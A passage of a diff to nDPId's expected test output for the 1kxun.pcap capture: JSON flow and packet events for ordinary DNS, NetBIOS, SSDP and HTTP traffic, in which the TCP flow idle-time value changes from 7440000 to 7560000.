00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1470104377901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104377901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcgAAIARpSbAqHMICAgICM3zADUAKlE0ceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378005,"flow_last_seen":1470104378005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104378005,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1470104378005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378005,"pkt":"ABAj4ACgYMVHBbyMCABFAAAol0tAAEAGqdjAqAUQwKhzS9F2AbsV1ofmvikqE1ARIAA8\/AAAAAAAAAAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104378007,"pkt":"ABxCjnAxABAj4ACgCABFAAAoAABAAEAGQSTAqHNLwKgFEAG70Xa+KSoTFdaH51AQAEZctgAAAAAAAAAA"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1470104378021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104378021,"pkt":"\/\/\/\/\/\/\/\/ABxCjnAxCABFAABOUckAAIAR9HzAqHMIwKj\/\/wCJAIkAOha6seYBEAABAAAAAAAAIEZIRkFFQkVFQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378021,"flow_last_seen":1470104378021,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104378021,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -92,57 +92,57 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1470104378901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1470104378901,"pkt":"TF4M6gNlABxCjnAxCABFAAA+UcwAAIARC9LAqHMIqF8BAc3zADUAKrfjceUBAAABAAAAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAQ=="} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1470104378905,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378905,"pkt":"ABxCjnAxTF4M6gNlCABFAABelWIAAPgRUBuoXwEBwKhzCAA1zfMASvjnceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAjMABN5J\/qfADAABAAEAAAIzAATeSf5x"} 00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104378901,"flow_last_seen":1470104378905,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378905,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"168.95.1.1","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.167"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104378906,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104378906,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1470104378906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378906,"pkt":"TF4M6gNlABxCjnAxCABFAAA0Uc5AAIAGmFPAqHMI3kn+p8G+AFDrM0BvAAAAAIACIABRhAAAAgQE7AEDAwgBAQQC"} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1470104378954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1470104378954,"pkt":"ABxCjnAxTF4M6gNlCABFAABeST8AADAR\/Y8ICAgIwKhzCAA1zfMASpHwceWBgAABAAIAAAAABmthbmthbgUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABN5J\/nHADAABAAEAAAJXAATeSf6n"} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1470104378954,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"kankan.1kxun.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.254.113"}} 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRMAAAQRv2DAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1470104378967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104378967,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfiAAAAERhWDAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1470104378970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104378970,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADEGOSLeSf6nwKhzCABQwb6HB4x76zNAcIASFtBGWQAAAgQFtAEBBAIBAwMH"} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104378906,"flow_last_seen":1470104378975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1470104378975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"kankan.1kxun.com","url":"kankan.1kxun.com\/api\/videos\/alsolikes\/10410.json?callback=jQuery18306855657112319022_1470103242123&_=1470104377899","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379066,"flow_last_seen":1470104379066,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1470104379066,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1470104379066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1470104379066,"pkt":"TF4M6gNlABxCjnAxCABFAAA7UdIAAIARpR\/AqHMICAgICO00ADUAJ9woKZABAAABAAAAAAAAA3BpYwUxa3h1bgNjb20AAAEAAQ=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1470104379115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1470104379115,"pkt":"ABxCjnAxTF4M6gNlCABFAAB7GLEAAC4RMAEICAgIwKhzCAA17TQAZ+zhKZCBgAABAAQAAAAAA3BpYwUxa3h1bgNjb20AAAEAAcAMAAEAAQAAAlcABGq7I\/bADAABAAEAAAJXAASAx7rowAwAAQABAAACVwAEgMdvqcAMAAEAAQAAAlcABGq6Ezo="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} 